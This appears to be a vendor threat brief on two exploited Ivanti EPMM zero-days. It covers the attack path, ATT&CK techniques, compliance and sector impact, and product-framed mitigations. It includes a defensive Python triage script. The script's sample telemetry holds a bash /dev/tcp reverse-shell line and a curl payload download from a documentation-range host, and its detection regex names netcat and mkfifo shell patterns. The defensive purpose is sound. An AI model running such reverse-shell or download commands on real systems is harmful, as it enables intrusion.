Executive Summary
In January 2026, two critical zero-day vulnerabilities, CVE-2026-1281 and CVE-2026-1340, were discovered in Ivanti Endpoint Manager Mobile (EPMM). These vulnerabilities allow unauthenticated remote code execution, enabling attackers to gain full control over mobile device management infrastructure without requiring user interaction or credentials. Exploitation activities have included establishing reverse shells, installing web shells, conducting reconnaissance, and downloading malware. Affected sectors span state and local government, healthcare, manufacturing, professional and legal services, and high technology across the United States, Germany, Australia, and Canada.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) Catalog, underscoring the severity of the threat. Threat actors are rapidly advancing their operations, moving from initial reconnaissance to deploying persistent backdoors designed to maintain long-term access, even after organizations apply patches.
Why This Matters Now
Exploitation followed disclosure within days, and the footholds observed (web shells and other backdoors) are not removed by applying a patch. Organizations should therefore patch EPMM immediately, then treat every appliance that was exposed while unpatched as potentially compromised: hunt for web shells and unexpected outbound connections, and tighten monitoring of the appliance's egress traffic.
Attack Path Analysis
Attackers exploited the unauthenticated remote code execution vulnerabilities in Ivanti EPMM to gain initial access. They then established reverse shells for interactive access and installed web shells for persistence. From those footholds they conducted reconnaissance and moved laterally within the network, and set up command and control channels that also served to exfiltrate sensitive data. The attack culminated in the deployment of malware and the resulting operational disruption.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited unauthenticated remote code execution vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti EPMM to gain initial access.
Related CVEs
CVE-2026-1281
CVSS 9.8. A code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM) allows unauthenticated remote code execution.
Affected Products:
Ivanti Endpoint Manager Mobile (EPMM) – 12.5.0.x, 12.6.0.x, 12.7.0.x, 12.5.1.0, 12.6.1.0
Exploit Status:
Exploited in the wild
CVE-2026-1340
CVSS 9.8. A code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM) allows unauthenticated remote code execution.
Affected Products:
Ivanti Endpoint Manager Mobile (EPMM) – 12.5.0.x, 12.6.0.x, 12.7.0.x, 12.5.1.0, 12.6.1.0
Exploit Status:
Exploited in the wild
MITRE ATT&CK® Techniques
T1190 Exploit Public-Facing Application
T1059.004 Command and Scripting Interpreter: Unix Shell
T1505.003 Server Software Component: Web Shell
T1071.001 Application Layer Protocol: Web Protocols
T1046 Network Service Discovery
T1105 Ingress Tool Transfer
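The techniques above describe what the attackers did on the appliance after exploitation, which is what a defender can still detect when the exploit request itself is not logged or not yet characterized. The following triage script is an added example written for this page; it is not code from the advisory, from Unit 42 or from Ivanti. It scans host telemetry for the post-exploitation behaviours the advisory attributes to these intrusions (a web-application process forking a Unix shell, reverse-shell one-liners, file downloads by the web service account, new server-side scripts in the served directory, port scanning) rather than for the CVE-2026-1281 / CVE-2026-1340 exploit requests, for which the page gives no request-level indicators. The web-tier process names, the service accounts, the web root path and every sample event are constructed assumptions and must be adjusted to the real appliance.

```python
"""Post-exploitation triage for an Ivanti EPMM appliance (added example).

Not code from the advisory, Unit 42 or Ivanti. It maps host telemetry to
the ATT&CK techniques the advisory lists, not to the exploit itself.
Process names, accounts, the web root and all sample events are assumptions.
"""
import json
import re
from collections import Counter, namedtuple

# Assumption: EPMM's web tier runs in a servlet container started by one of
# these parent binaries under one of these accounts; adjust to the appliance.
WEB_PARENTS = {"java", "httpd", "nginx"}
WEB_USERS = {"tomcat", "apache", "www-data"}
WEBROOT = "/var/www/"                      # assumed served directory
SHELLS = {"sh", "bash", "dash"}
DOWNLOADERS = {"curl", "wget"}
SCANNERS = {"nmap", "masscan"}
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b[^|;]*\s-e\s|\bncat\b.*--exec|mkfifo", re.I)
WEB_SHELL_EXT = re.compile(r"\.(jsp|jspx|php|war)$", re.I)

Finding = namedtuple("Finding", "technique rule event")


def _basename(path):
    return path.rsplit("/", 1)[-1]


def triage_event(ev):
    """Return the ATT&CK techniques one process or file event matches."""
    findings = []
    if ev.get("type") == "exec":
        exe, parent = _basename(ev["exe"]), _basename(ev["parent"])
        cmd, user = ev["cmdline"], ev["user"]
        # T1059.004: the web application itself forking a Unix shell
        if parent in WEB_PARENTS and exe in SHELLS:
            findings.append(Finding("T1059.004", "web process spawned shell", ev))
        # T1059.004: classic reverse-shell one-liners
        if REVERSE_SHELL.search(cmd):
            findings.append(Finding("T1059.004", "reverse shell pattern", ev))
        # T1105: the web account pulling a remote file onto the appliance
        if exe in DOWNLOADERS and user in WEB_USERS and "://" in cmd:
            findings.append(Finding("T1105", "download by web user", ev))
        # T1046: port scanning launched from the web account
        if exe in SCANNERS and user in WEB_USERS:
            findings.append(Finding("T1046", "service discovery by web user", ev))
    elif ev.get("type") == "file_create":
        # T1505.003: a new server-side script dropped into the served tree
        if ev["path"].startswith(WEBROOT) and WEB_SHELL_EXT.search(ev["path"]):
            findings.append(Finding("T1505.003", "new script in web root", ev))
    return findings


def triage_log(jsonl):
    """Run triage_event over a JSON-lines telemetry export."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            findings.extend(triage_event(json.loads(line)))
    return findings


def summarize(findings):
    """Count findings per technique as a quick incident-scoping view."""
    return dict(Counter(f.technique for f in findings))


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = """\
{"type":"exec","user":"tomcat","parent":"/usr/bin/java","exe":"/bin/sh","cmdline":"sh -c id"}
{"type":"exec","user":"tomcat","parent":"/bin/sh","exe":"/bin/bash","cmdline":"bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"}
{"type":"exec","user":"tomcat","parent":"/bin/sh","exe":"/usr/bin/curl","cmdline":"curl -o /tmp/.x http://203.0.113.10/x"}
{"type":"file_create","user":"tomcat","path":"/var/www/app/ROOT/help.jsp"}
{"type":"exec","user":"root","parent":"/usr/lib/systemd/systemd","exe":"/usr/bin/curl","cmdline":"curl https://updates.example.invalid/feed"}
{"type":"exec","user":"tomcat","parent":"/bin/sh","exe":"/usr/bin/nmap","cmdline":"nmap -sT 10.0.0.0/24"}
"""

if __name__ == "__main__":
    for f in triage_log(SAMPLE_EVENTS):
        print(f.technique, f.rule, f.event.get("cmdline", f.event.get("path")))
    print(summarize(triage_log(SAMPLE_EVENTS)))
```

The parent-process rule is the highest-signal check: a servlet container has no legitimate reason to fork `/bin/sh`, so that event alone justifies isolating the appliance, whereas the download and scanner rules are scoped to the web service account to keep routine root-level maintenance (the fifth sample event) out of the results.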
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Asset Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Government Administration
Critical exposure to remote code execution vulnerabilities in Ivanti EPMM mobile device management systems, with observed exploitation targeting state and local government infrastructure requiring immediate patching.
Health Care / Life Sciences
Healthcare organizations face severe risks from unauthenticated remote code execution attacks on mobile device management platforms, potentially compromising patient data and HIPAA compliance requirements.
Computer Software/Engineering
High technology sector directly impacted by Ivanti EPMM vulnerabilities enabling reverse shells and web shell installation, threatening enterprise mobile fleet security and software development environments.
Legal Services
Professional and legal services organizations vulnerable to remote code execution attacks through mobile device management systems, risking client confidentiality and regulatory compliance across multiple jurisdictions.
Sources
- Critical Vulnerabilities in Ivanti EPMM Exploited (Palo Alto Networks Unit 42): https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/
- NVD - CVE-2026-1281: https://nvd.nist.gov/vuln/detail/CVE-2026-1281
- NVD - CVE-2026-1340: https://nvd.nist.gov/vuln/detail/CVE-2026-1340
- Ivanti warns of two EPMM flaws exploited in zero-day attacks (BleepingComputer): https://www.bleepingcomputer.com/news/security/ivanti-warns-of-two-epmm-flaws-exploited-in-zero-day-attacks/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident because it embeds security controls into the cloud network fabric, which can limit an attacker's ability to move laterally from a compromised EPMM appliance and to exfiltrate data. None of these controls prevent the initial exploitation of an unpatched appliance; they reduce what a compromised appliance can reach and make its post-exploitation activity visible.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While initial exploitation may still occur, Aviatrix CNSF could restrict the compromised appliance's network reach and surface the reverse-shell and command and control connections that follow exploitation.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation could limit the attacker's ability to move laterally from the EPMM host to other workloads, containing the intrusion to the appliance.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security could limit the attacker's ability to move laterally and conduct network reconnaissance within the network.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control could expose the unexpected outbound connections used as command and control channels and for data exfiltration.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement could block outbound connections from the EPMM appliance to destinations not on its allow list, which interrupts reverse shells, the download of additional tooling, and exfiltration over command and control channels.
Aviatrix Zero Trust CNSF could limit the scope of operational disruption caused by malware deployment.
Impact at a Glance
Affected Business Functions
- Mobile Device Management
- Network Security
- User Authentication
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data managed through EPMM, including device configurations and user information.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement from the EPMM appliance within the network.
- Deploy Inline IPS (Suricata) to detect and prevent exploitation attempts and the reverse-shell and tool-download traffic that follows them.
- Utilize Threat Detection & Anomaly Response systems to identify and respond to malicious activities, in particular the EPMM web process spawning a shell and new files appearing in the served directory.
- Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic from the appliance, which is the channel every observed reverse shell, command and control session, and malware download depends on.
- Apply Ivanti's fixed EPMM releases promptly and keep all systems patched; because the web shells and backdoors observed survive a patch, verify any appliance that was exposed while unpatched for compromise before trusting it again.